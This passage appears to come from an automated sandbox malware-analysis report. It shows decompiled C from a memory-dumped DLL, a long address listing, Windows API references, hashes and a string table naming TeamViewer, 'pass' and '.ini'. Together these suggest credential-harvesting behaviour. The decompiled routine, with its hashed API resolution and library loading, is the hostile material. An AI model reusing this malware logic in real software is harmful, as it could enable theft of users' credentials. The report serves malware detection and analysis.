									if(_t446 != 0) {
										_v944 = 0xa4a1b443;
										_v940 = E6F337EE0;
										_v936 =  &M6F3405F4;
										_v932 = 0;
										E6F331FA0(_t446,  &_v944, 1, _v952 + 0x435a88);
										_t627 = _t627 + 0x10;
									}
									_t447 = E6F331D50(0x37b4c, _t601);
									_t561 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
									wsprintfA( &_v552, "%s%s", _t561, _t447);
									_t628 = _t627 + 0x18;
									_t450 = LoadLibraryA( &_v544);
									M6F3404A4 = _t450;
									if(_t450 != 0) {
										_v936 = 0x468fa9db;
										_v932 = E6F338370;
										_v928 =  &M6F340604;
										_v924 = 0;
										E6F331FA0(_t450,  &_v936, 1, _v944 + 0x435a88);
										_t628 = _t628 + 0x10;
									}
									_t451 = E6F3331F0(0xffffffff);
									_push(0xa);
									_push(0x10);
									_push(L"15.0.");
									M6F3404EC = _t451;
									_push(E6F331D50(0x1f3ac, _t601));
									E6F338400();
									if(E6F33B820(0) != 0) {
										ExitProcess(0);
									}
									M6F340614 = 2;
									return 1;
								} else {
									goto L131;
								}
							}
						}
					}
				}
			}


























































































































































































































































                                                                                                                        0x6f33851e
                                                                                                                        0x6f338522
                                                                                                                        0x6f3394d7
                                                                                                                        0x6f3394e8
                                                                                                                        0x6f3394ea
                                                                                                                        0x6f3394f1
                                                                                                                        0x6f3394f1
                                                                                                                        0x6f3394f3
                                                                                                                        0x6f3394f8
                                                                                                                        0x6f3394fa
                                                                                                                        0x6f339501
                                                                                                                        0x6f339501
                                                                                                                        0x6f339503
                                                                                                                        0x6f339508
                                                                                                                        0x6f33950a
                                                                                                                        0x6f339511
                                                                                                                        0x6f339511
                                                                                                                        0x6f339513
                                                                                                                        0x6f339518
                                                                                                                        0x6f33951a
                                                                                                                        0x6f339521
                                                                                                                        0x6f339521
                                                                                                                        0x6f339523
                                                                                                                        0x6f339528
                                                                                                                        0x6f33952a
                                                                                                                        0x6f339531
                                                                                                                        0x6f339531
                                                                                                                        0x6f339533
                                                                                                                        0x6f339538
                                                                                                                        0x6f33953a
                                                                                                                        0x6f339541
                                                                                                                        0x6f339541
                                                                                                                        0x6f339543
                                                                                                                        0x6f339548
                                                                                                                        0x6f33954a
                                                                                                                        0x6f339551
                                                                                                                        0x6f339551
                                                                                                                        0x6f339553
                                                                                                                        0x6f339558
                                                                                                                        0x6f33955a
                                                                                                                        0x6f339561
                                                                                                                        0x6f339561
                                                                                                                        0x6f339563
                                                                                                                        0x6f339568
                                                                                                                        0x6f33956a
                                                                                                                        0x6f339571
                                                                                                                        0x6f339571
                                                                                                                        0x6f339573
                                                                                                                        0x6f339578
                                                                                                                        0x6f33957a
                                                                                                                        0x6f339581
                                                                                                                        0x6f339581
                                                                                                                        0x6f339583
                                                                                                                        0x6f339588
                                                                                                                        0x6f33958a
                                                                                                                        0x6f339591
                                                                                                                        0x6f339591
                                                                                                                        0x6f339593
                                                                                                                        0x6f339598
                                                                                                                        0x6f33959a
                                                                                                                        0x6f3395a1
                                                                                                                        0x6f3395a1
                                                                                                                        0x6f3395a3
                                                                                                                        0x6f3395a8
                                                                                                                        0x6f3395aa
                                                                                                                        0x6f3395b1
                                                                                                                        0x6f3395b1
                                                                                                                        0x6f3395b3
                                                                                                                        0x6f3395b9
                                                                                                                        0x6f3395bf
                                                                                                                        0x6f3395ca
                                                                                                                        0x6f3395cc
                                                                                                                        0x6f3395cf
                                                                                                                        0x6f3395cf
                                                                                                                        0x6f3395d1
                                                                                                                        0x6f3395d6
                                                                                                                        0x6f3395d8
                                                                                                                        0x6f3395db
                                                                                                                        0x6f3395db
                                                                                                                        0x6f3395dd
                                                                                                                        0x6f3395e2
                                                                                                                        0x6f3395e4
                                                                                                                        0x6f3395e7
                                                                                                                        0x6f3395e7
                                                                                                                        0x6f3395e9
                                                                                                                        0x6f3395ee
                                                                                                                        0x6f3395f0
                                                                                                                        0x6f3395f3
                                                                                                                        0x6f3395f3
                                                                                                                        0x6f3395f5
                                                                                                                        0x6f3395fa
                                                                                                                        0x6f3395fc
                                                                                                                        0x6f3395ff
                                                                                                                        0x6f3395ff
                                                                                                                        0x6f339601
                                                                                                                        0x6f339606
                                                                                                                        0x6f339608
                                                                                                                        0x6f33960b
                                                                                                                        0x6f33960b
                                                                                                                        0x6f33960d
                                                                                                                        0x6f339612
                                                                                                                        0x6f339614
                                                                                                                        0x6f339617
                                                                                                                        0x6f339617
                                                                                                                        0x6f339619
                                                                                                                        0x6f33961e
                                                                                                                        0x6f339620
                                                                                                                        0x6f339627
                                                                                                                        0x6f339627
                                                                                                                        0x6f339629
                                                                                                                        0x6f33962e
                                                                                                                        0x6f339630
                                                                                                                        0x6f339637
                                                                                                                        0x6f339637
                                                                                                                        0x6f339639
                                                                                                                        0x6f33963e
                                                                                                                        0x6f339640
                                                                                                                        0x6f339647
                                                                                                                        0x6f339647
                                                                                                                        0x6f339649
                                                                                                                        0x6f33964e
                                                                                                                        0x6f339650
                                                                                                                        0x6f339657
                                                                                                                        0x6f339657
                                                                                                                        0x6f339659
                                                                                                                        0x6f33965e
                                                                                                                        0x6f339660
                                                                                                                        0x6f339663
                                                                                                                        0x6f339663
                                                                                                                        0x6f339669
                                                                                                                        0x6f339670
                                                                                                                        0x6f339673
                                                                                                                        0x6f339673
                                                                                                                        0x6f339678
                                                                                                                        0x6f33967e
                                                                                                                        0x6f339680
                                                                                                                        0x6f339680
                                                                                                                        0x6f33968b
                                                                                                                        0x6f339690
                                                                                                                        0x6f339690
                                                                                                                        0x6f339692
                                                                                                                        0x6f339694
                                                                                                                        0x6f339697
                                                                                                                        0x6f339697
                                                                                                                        0x6f339699
                                                                                                                        0x6f33969c
                                                                                                                        0x6f33969c
                                                                                                                        0x6f3396a4
                                                                                                                        0x6f3396a9
                                                                                                                        0x6f3396ab
                                                                                                                        0x6f3396af
                                                                                                                        0x6f3396b4
                                                                                                                        0x6f3396bb
                                                                                                                        0x6f3396bb
                                                                                                                        0x6f3396ab
                                                                                                                        0x00000000
                                                                                                                        0x6f338528
                                                                                                                        0x6f338529
                                                                                                                        0x6f3396c0
                                                                                                                        0x6f3396cc
                                                                                                                        0x6f33852f
                                                                                                                        0x6f338537
                                                                                                                        0x6f338551
                                                                                                                        0x6f338556
                                                                                                                        0x6f338563
                                                                                                                        0x6f33856b
                                                                                                                        0x6f338578
                                                                                                                        0x6f33857b
                                                                                                                        0x6f33857b
                                                                                                                        0x6f338581
                                                                                                                        0x6f33858e
                                                                                                                        0x6f33859a
                                                                                                                        0x6f3385aa
                                                                                                                        0x6f3385bc
                                                                                                                        0x6f3385c4
                                                                                                                        0x6f3385c6
                                                                                                                        0x6f3385cc
                                                                                                                        0x6f3385d5
                                                                                                                        0x6f3385da
                                                                                                                        0x6f3385df
                                                                                                                        0x6f3385e7
                                                                                                                        0x6f3385ec
                                                                                                                        0x6f3385f6
                                                                                                                        0x6f3385fb
                                                                                                                        0x6f338601
                                                                                                                        0x6f338608
                                                                                                                        0x6f33860a
                                                                                                                        0x6f338610
                                                                                                                        0x6f338616
                                                                                                                        0x6f33861f
                                                                                                                        0x6f338624
                                                                                                                        0x6f338632
                                                                                                                        0x6f338637
                                                                                                                        0x6f33863f
                                                                                                                        0x6f33864d
                                                                                                                        0x6f338669
                                                                                                                        0x6f338671
                                                                                                                        0x6f338679
                                                                                                                        0x6f338680
                                                                                                                        0x6f338684
                                                                                                                        0x6f338690
                                                                                                                        0x6f33869b
                                                                                                                        0x6f3386a0
                                                                                                                        0x6f3386a3
                                                                                                                        0x6f3386a3
                                                                                                                        0x6f3386c8
                                                                                                                        0x6f3386d0
                                                                                                                        0x6f3386d4
                                                                                                                        0x6f3386da
                                                                                                                        0x6f3386e5
                                                                                                                        0x6f3386ea
                                                                                                                        0x6f33870f
                                                                                                                        0x6f338716
                                                                                                                        0x6f33871b
                                                                                                                        0x6f338721
                                                                                                                        0x6f338731
                                                                                                                        0x6f338752
                                                                                                                        0x6f33875d
                                                                                                                        0x6f338768
                                                                                                                        0x6f338772
                                                                                                                        0x6f338779
                                                                                                                        0x6f33877e
                                                                                                                        0x6f338784
                                                                                                                        0x6f338794
                                                                                                                        0x00000000
                                                                                                                        0x6f338796
                                                                                                                        0x6f338797
                                                                                                                        0x6f338797
                                                                                                                        0x6f338794
                                                                                                                        0x6f338731
                                                                                                                        0x6f3386ea
                                                                                                                        0x6f33879d
                                                                                                                        0x6f3387a7
                                                                                                                        0x6f3387b0
                                                                                                                        0x6f3387b5
                                                                                                                        0x6f3387bb
                                                                                                                        0x6f3387c2
                                                                                                                        0x6f3387ce
                                                                                                                        0x6f3387d3
                                                                                                                        0x6f3387da
                                                                                                                        0x6f3387ec
                                                                                                                        0x6f3387f1
                                                                                                                        0x6f3387fb
                                                                                                                        0x6f338805
                                                                                                                        0x6f338811
                                                                                                                        0x6f338816
                                                                                                                        0x6f33881b
                                                                                                                        0x6f33881e
                                                                                                                        0x6f338823
                                                                                                                        0x6f338829
                                                                                                                        0x6f33882e
                                                                                                                        0x6f33883b
                                                                                                                        0x00000000
                                                                                                                        0x6f338841
                                                                                                                        0x6f338841
                                                                                                                        0x6f338844
                                                                                                                        0x6f33884c
                                                                                                                        0x00000000
                                                                                                                        0x6f338852
                                                                                                                        0x6f33885f
                                                                                                                        0x6f338866
                                                                                                                        0x6f33886a
                                                                                                                        0x6f338878
                                                                                                                        0x6f33887a
                                                                                                                        0x6f338881
                                                                                                                        0x6f33888c
                                                                                                                        0x6f338894
                                                                                                                        0x6f338896
                                                                                                                        0x6f33889d
                                                                                                                        0x6f33889d
                                                                                                                        0x6f338894
                                                                                                                        0x6f3388a7
                                                                                                                        0x6f3388b5
                                                                                                                        0x6f3388b7
                                                                                                                        0x6f3388be
                                                                                                                        0x6f3388cb
                                                                                                                        0x6f3388d3
                                                                                                                        0x6f3388d8
                                                                                                                        0x6f3388dc
                                                                                                                        0x6f3388df
                                                                                                                        0x6f3388df
                                                                                                                        0x6f3388d8
                                                                                                                        0x6f3388e4
                                                                                                                        0x6f3388ec
                                                                                                                        0x6f3388f6
                                                                                                                        0x6f3388fb
                                                                                                                        0x6f338900
                                                                                                                        0x6f338900
                                                                                                                        0x6f338905
                                                                                                                        0x6f33890a
                                                                                                                        0x6f33890f
                                                                                                                        0x6f338912
                                                                                                                        0x6f338912
                                                                                                                        0x6f338921
                                                                                                                        0x6f338923
                                                                                                                        0x6f33892a
                                                                                                                        0x6f33892c
                                                                                                                        0x6f338943
                                                                                                                        0x6f338949
                                                                                                                        0x6f338952
                                                                                                                        0x6f338957
                                                                                                                        0x6f33895a
                                                                                                                        0x6f33895a
                                                                                                                        0x6f33896a
                                                                                                                        0x6f33897a
                                                                                                                        0x6f33897f
                                                                                                                        0x6f338994
                                                                                                                        0x6f338999
                                                                                                                        0x6f3389a4
                                                                                                                        0x6f3389a9
                                                                                                                        0x6f3389b9
                                                                                                                        0x6f3389c9
                                                                                                                        0x6f3389d9
                                                                                                                        0x6f3389e9
                                                                                                                        0x6f3389f9
                                                                                                                        0x6f338a09
                                                                                                                        0x6f338a1c
                                                                                                                        0x6f338a2c
                                                                                                                        0x6f338a3c
                                                                                                                        0x6f338a4c
                                                                                                                        0x6f338a5c
                                                                                                                        0x6f338a6c
                                                                                                                        0x6f338a7c
                                                                                                                        0x6f338a89
                                                                                                                        0x6f338a92
                                                                                                                        0x6f338aa3
                                                                                                                        0x6f338ab3
                                                                                                                        0x6f338acb
                                                                                                                        0x6f338ae3
                                                                                                                        0x6f338af3
                                                                                                                        0x6f338b0b
                                                                                                                        0x6f338b10
                                                                                                                        0x6f338b16
                                                                                                                        0x6f338b1c
                                                                                                                        0x6f338b28
                                                                                                                        0x6f338b2a
                                                                                                                        0x6f338b2f
                                                                                                                        0x6f338b39
                                                                                                                        0x6f338b3f
                                                                                                                        0x6f338b46
                                                                                                                        0x6f338b48
                                                                                                                        0x6f338b50
                                                                                                                        0x6f338b55
                                                                                                                        0x6f338b7c
                                                                                                                        0x6f338b7c
                                                                                                                        0x6f338b80
                                                                                                                        0x6f338b82
                                                                                                                        0x6f338b85
                                                                                                                        0x6f338b98
                                                                                                                        0x6f338b98
                                                                                                                        0x6f338b9b
                                                                                                                        0x6f338b9d
                                                                                                                        0x6f338ba0
                                                                                                                        0x6f338ba2
                                                                                                                        0x6f338ba2
                                                                                                                        0x6f338ba0
                                                                                                                        0x6f338b87
                                                                                                                        0x6f338b87
                                                                                                                        0x6f338b8a
                                                                                                                        0x00000000
                                                                                                                        0x6f338b8c
                                                                                                                        0x6f338b8c
                                                                                                                        0x6f338b8c
                                                                                                                        0x6f338b8a
                                                                                                                        0x6f338b57
                                                                                                                        0x6f338b57
                                                                                                                        0x6f338b5e
                                                                                                                        0x00000000
                                                                                                                        0x6f338b65
                                                                                                                        0x6f338b65
                                                                                                                        0x6f338b69
                                                                                                                        0x6f338b6b
                                                                                                                        0x6f338b71
                                                                                                                        0x6f338b75
                                                                                                                        0x6f338b75
                                                                                                                        0x6f338b5e
                                                                                                                        0x6f338bac
                                                                                                                        0x6f338bad
                                                                                                                        0x6f338b50
                                                                                                                        0x6f338bb2
                                                                                                                        0x6f338bb2
                                                                                                                        0x6f338bb8
                                                                                                                        0x6f338bba
                                                                                                                        0x6f338bbf
                                                                                                                        0x6f338bc4
                                                                                                                        0x6f338bcd
                                                                                                                        0x6f338bd2
                                                                                                                        0x6f338bd7
                                                                                                                        0x6f338bdd
                                                                                                                        0x6f338be6
                                                                                                                        0x6f338bf4
                                                                                                                        0x6f338c01
                                                                                                                        0x6f338c08
                                                                                                                        0x6f338c0c
                                                                                                                        0x6f338c12
                                                                                                                        0x6f338c1c
                                                                                                                        0x6f338c22
                                                                                                                        0x6f338c2f
                                                                                                                        0x6f338c34
                                                                                                                        0x6f338c3c
                                                                                                                        0x6f338c4a
                                                                                                                        0x6f338c4c
                                                                                                                        0x6f338c51
                                                                                                                        0x6f338c53
                                                                                                                        0x6f338c59
                                                                                                                        0x6f338c5a
                                                                                                                        0x6f338c5b
                                                                                                                        0x6f338c63
                                                                                                                        0x6f338c67
                                                                                                                        0x6f338c6b
                                                                                                                        0x6f338c6f
                                                                                                                        0x6f338c74
                                                                                                                        0x6f338c78
                                                                                                                        0x6f338c7d
                                                                                                                        0x6f338c7f
                                                                                                                        0x6f338c7f
                                                                                                                        0x6f338c92
                                                                                                                        0x6f338c97
                                                                                                                        0x6f338c9d
                                                                                                                        0x6f338cae
                                                                                                                        0x6f338cb4
                                                                                                                        0x6f338cc0
                                                                                                                        0x6f338cce
                                                                                                                        0x6f338cd4
                                                                                                                        0x6f338ce0
                                                                                                                        0x6f338ce3
                                                                                                                        0x6f338ce3
                                                                                                                        0x6f338cee
                                                                                                                        0x6f338cf6
                                                                                                                        0x6f338cf7
                                                                                                                        0x6f338d01
                                                                                                                        0x6f338d19
                                                                                                                        0x6f338d20
                                                                                                                        0x6f338d27
                                                                                                                        0x6f338d2e
                                                                                                                        0x6f338d4e
                                                                                                                        0x6f338d43
                                                                                                                        0x6f338d43
                                                                                                                        0x6f338d48
                                                                                                                        0x6f338d48
                                                                                                                        0x6f338d52
                                                                                                                        0x6f338d58
                                                                                                                        0x6f338d5d
                                                                                                                        0x6f338d63
                                                                                                                        0x6f338d64
                                                                                                                        0x6f338d65
                                                                                                                        0x6f338d6d
                                                                                                                        0x6f338d71
                                                                                                                        0x6f338d75
                                                                                                                        0x6f338d79
                                                                                                                        0x6f338d7e
                                                                                                                        0x6f338d82
                                                                                                                        0x6f338d87
                                                                                                                        0x6f338d89
                                                                                                                        0x6f338d89
                                                                                                                        0x6f338d8e
                                                                                                                        0x6f338d9d
                                                                                                                        0x6f338da5
                                                                                                                        0x6f338dad
                                                                                                                        0x6f338db5
                                                                                                                        0x6f338db9
                                                                                                                        0x6f338dc1
                                                                                                                        0x6f338dc9
                                                                                                                        0x6f338dd1
                                                                                                                        0x6f338dd5
                                                                                                                        0x6f338ddd
                                                                                                                        0x6f338de5
                                                                                                                        0x6f338ded
                                                                                                                        0x6f338df1
                                                                                                                        0x6f338df9
                                                                                                                        0x6f338e01
                                                                                                                        0x6f338e09
                                                                                                                        0x6f338e0d
                                                                                                                        0x6f338e15
                                                                                                                        0x6f338e1d
                                                                                                                        0x6f338e25
                                                                                                                        0x6f338e29
                                                                                                                        0x6f338e2e
                                                                                                                        0x6f338e2e
                                                                                                                        0x6f338e37
                                                                                                                        0x6f338e3c
                                                                                                                        0x6f338e57
                                                                                                                        0x6f338e59
                                                                                                                        0x6f338e64
                                                                                                                        0x6f338e6a
                                                                                                                        0x6f338e71
                                                                                                                        0x6f338e89
                                                                                                                        0x6f338e94
                                                                                                                        0x6f338e9f
                                                                                                                        0x6f338eaa
                                                                                                                        0x6f338eb1
                                                                                                                        0x6f338ebc
                                                                                                                        0x6f338ec7
                                                                                                                        0x6f338ed2
                                                                                                                        0x6f338ed9
                                                                                                                        0x6f338ee4
                                                                                                                        0x6f338eef
                                                                                                                        0x6f338efa
                                                                                                                        0x6f338f01
                                                                                                                        0x6f338f0c
                                                                                                                        0x6f338f17
                                                                                                                        0x6f338f22
                                                                                                                        0x6f338f29
                                                                                                                        0x6f338f34
                                                                                                                        0x6f338f3f
                                                                                                                        0x6f338f4a
                                                                                                                        0x6f338f51
                                                                                                                        0x6f338f5c
                                                                                                                        0x6f338f67
                                                                                                                        0x6f338f72
                                                                                                                        0x6f338f79
                                                                                                                        0x6f338f84
                                                                                                                        0x6f338f8f
                                                                                                                        0x6f338f9a
                                                                                                                        0x6f338fa1
                                                                                                                        0x6f338fac
                                                                                                                        0x6f338fb7
                                                                                                                        0x6f338fc2
                                                                                                                        0x6f338fc9
                                                                                                                        0x6f338fd4
                                                                                                                        0x6f338fdf
                                                                                                                        0x6f338fea
                                                                                                                        0x6f338ff1
                                                                                                                        0x6f338ffc
                                                                                                                        0x6f339007
                                                                                                                        0x6f339012
                                                                                                                        0x6f339019
                                                                                                                        0x6f339024
                                                                                                                        0x6f33902f
                                                                                                                        0x6f33903a
                                                                                                                        0x6f339041
                                                                                                                        0x6f33904c
                                                                                                                        0x6f339057
                                                                                                                        0x6f339062
                                                                                                                        0x6f339069
                                                                                                                        0x6f339074
                                                                                                                        0x6f33907f
                                                                                                                        0x6f33908a
                                                                                                                        0x6f339091
                                                                                                                        0x6f33909c
                                                                                                                        0x6f3390a7
                                                                                                                        0x6f3390b2
                                                                                                                        0x6f3390b9
                                                                                                                        0x6f3390c4
                                                                                                                        0x6f3390cf
                                                                                                                        0x6f3390da
                                                                                                                        0x6f3390e1
                                                                                                                        0x6f3390ec
                                                                                                                        0x6f3390f7
                                                                                                                        0x6f339102
                                                                                                                        0x6f339109
                                                                                                                        0x6f339114
                                                                                                                        0x6f33911f
                                                                                                                        0x6f33912a
                                                                                                                        0x6f339131
                                                                                                                        0x6f339136
                                                                                                                        0x6f33913c
                                                                                                                        0x6f339141
                                                                                                                        0x6f339146
                                                                                                                        0x6f33914b
                                                                                                                        0x6f33914f
                                                                                                                        0x6f339152
                                                                                                                        0x6f339157
                                                                                                                        0x6f33915b
                                                                                                                        0x6f339160
                                                                                                                        0x6f339165
                                                                                                                        0x6f339169
                                                                                                                        0x6f339176
                                                                                                                        0x6f33917b
                                                                                                                        0x6f339180
                                                                                                                        0x6f33918c
                                                                                                                        0x6f339191
                                                                                                                        0x6f339196
                                                                                                                        0x6f3391a6
                                                                                                                        0x6f3391ab
                                                                                                                        0x6f3391b1
                                                                                                                        0x6f3391b3
                                                                                                                        0x6f3391b3
                                                                                                                        0x6f3391bd
                                                                                                                        0x6f3391c2
                                                                                                                        0x6f3391d7
                                                                                                                        0x6f3391d9
                                                                                                                        0x6f3391e4
                                                                                                                        0x6f3391ea
                                                                                                                        0x6f3391f1
                                                                                                                        0x6f3391f7
                                                                                                                        0x6f339206
                                                                                                                        0x6f33920e
                                                                                                                        0x6f339216
                                                                                                                        0x6f33921e
                                                                                                                        0x6f339222
                                                                                                                        0x6f33922a
                                                                                                                        0x6f339232
                                                                                                                        0x6f33923a
                                                                                                                        0x6f33923e
                                                                                                                        0x6f339246
                                                                                                                        0x6f33924e
                                                                                                                        0x6f339256
                                                                                                                        0x6f33925a
                                                                                                                        0x6f339262
                                                                                                                        0x6f33926a
                                                                                                                        0x6f339272
                                                                                                                        0x6f339276
                                                                                                                        0x6f33927b
                                                                                                                        0x6f33927b
                                                                                                                        0x6f339284
                                                                                                                        0x6f33928a
                                                                                                                        0x6f33929d
                                                                                                                        0x6f33929f
                                                                                                                        0x6f3392aa
                                                                                                                        0x6f3392b0
                                                                                                                        0x6f3392b7
                                                                                                                        0x6f3392b9
                                                                                                                        0x6f3392c8
                                                                                                                        0x6f3392d0
                                                                                                                        0x6f3392d8
                                                                                                                        0x6f3392e0
                                                                                                                        0x6f3392e4
                                                                                                                        0x6f3392ec
                                                                                                                        0x6f3392f4
                                                                                                                        0x6f3392fc
                                                                                                                        0x6f339300
                                                                                                                        0x6f339305
                                                                                                                        0x6f339305
                                                                                                                        0x6f33930e
                                                                                                                        0x6f339314
                                                                                                                        0x6f339327
                                                                                                                        0x6f339329
                                                                                                                        0x6f339334
                                                                                                                        0x6f33933a
                                                                                                                        0x6f339341
                                                                                                                        0x6f339352
                                                                                                                        0x6f33935a
                                                                                                                        0x6f339362
                                                                                                                        0x6f33936a
                                                                                                                        0x6f33936e
                                                                                                                        0x6f339373
                                                                                                                        0x6f339373
                                                                                                                        0x6f339384
                                                                                                                        0x6f339389
                                                                                                                        0x6f339395
                                                                                                                        0x6f3393a6
                                                                                                                        0x6f3393a8
                                                                                                                        0x6f3393b4
                                                                                                                        0x6f3393c2
                                                                                                                        0x6f3393c8
                                                                                                                        0x6f3393cf
                                                                                                                        0x6f3393e4
                                                                                                                        0x6f3393ec
                                                                                                                        0x6f3393f4
                                                                                                                        0x6f3393fc
                                                                                                                        0x6f339400
                                                                                                                        0x6f339405
                                                                                                                        0x6f339405
                                                                                                                        0x6f33940e
                                                                                                                        0x6f339413
                                                                                                                        0x6f339428
                                                                                                                        0x6f33942a
                                                                                                                        0x6f339435
                                                                                                                        0x6f33943b
                                                                                                                        0x6f339442
                                                                                                                        0x6f339457
                                                                                                                        0x6f33945f
                                                                                                                        0x6f339467
                                                                                                                        0x6f33946f
                                                                                                                        0x6f339473
                                                                                                                        0x6f339478
                                                                                                                        0x6f339478
                                                                                                                        0x6f33947d
                                                                                                                        0x6f339485
                                                                                                                        0x6f339487
                                                                                                                        0x6f339489
                                                                                                                        0x6f339494
                                                                                                                        0x6f3394a1
                                                                                                                        0x6f3394a2
                                                                                                                        0x6f3394b2
                                                                                                                        0x6f3394b5
                                                                                                                        0x6f3394b5
                                                                                                                        0x6f3394be
                                                                                                                        0x6f3394d4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33896a
                                                                                                                        0x6f33884c
                                                                                                                        0x6f33883b
                                                                                                                        0x6f338529

                                                                                                                        APIs
                                                                                                                        • DisableThreadLibraryCalls.KERNEL32(?), ref: 6F338537
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 6F33853E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F33855A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F338563
                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 6F338570
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33857B
                                                                                                                        • PathAddBackslashA.SHLWAPI(00996628), ref: 6F33858E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F338597
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33859A
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000000,00000104), ref: 6F3385AF
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000105), ref: 6F3385C1
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3385C4
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,009953A0,00000033), ref: 6F3385DA
                                                                                                                        • PathRemoveFileSpecA.SHLWAPI(009953A0), ref: 6F3385FB
                                                                                                                        • PathAddBackslashA.SHLWAPI(009953A0), ref: 6F338608
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(009953A0), ref: 6F338610
                                                                                                                        • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000000,00000000), ref: 6F338637
                                                                                                                        • PathAddBackslashA.SHLWAPI(?), ref: 6F33864D
                                                                                                                        • wsprintfA.USER32 ref: 6F338684
                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,%s%s,?,?), ref: 6F33869B
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F3386A3
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00996628), ref: 6F3394EE
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3394F1
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,009953A0), ref: 6F3394FE
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339501
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00996738), ref: 6F33950E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339511
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,009954B0), ref: 6F33951E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339521
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,009773E8), ref: 6F33952E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339531
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00997378), ref: 6F33953E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339541
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0098A1A0), ref: 6F33954E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339551
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0099B7A8), ref: 6F33955E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339561
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0099EC68), ref: 6F33956E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339571
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0099B258), ref: 6F33957E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339581
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00977288), ref: 6F33958E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339591
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0099D818), ref: 6F33959E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3395A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Free$Path$AllocBackslashFile$DirectoryExitModule$AttributesCallsCurrentDisableFolderHandleLibraryMemoryMoveNameRemoveSpecSpecialSystemThreadwsprintf
                                                                                                                        • String ID: %s%s$%s%s%s$.ini$.odt$15.0.$8?x$PBx$TeamViewer$\dx$ar.j$gd$h2$pass$pg$s$t$tx$word
                                                                                                                        • API String ID: 566710939-4171022235
                                                                                                                        • Opcode ID: 37a1d195b5df7c821955254ab1f47c053baa0b3a03710874f52666ca073924b3
                                                                                                                        • Instruction ID: f999455c21c1daccb96a09235b66c358848c5818597b540dc9325df1b255b9fb
                                                                                                                        • Opcode Fuzzy Hash: 37a1d195b5df7c821955254ab1f47c053baa0b3a03710874f52666ca073924b3
                                                                                                                        • Instruction Fuzzy Hash: 6BA2AEF2A08794AFDB20EF64CC84A9BBBEDEB95320F00591DF59997240DB349454CF62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3329D0, Relevance: 54.6, APIs: 24, Strings: 7, Instructions: 330memorycomstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 45%
                                                                                                                        			E6F3329D0() {
				intOrPtr _v56;
				void* _v76;
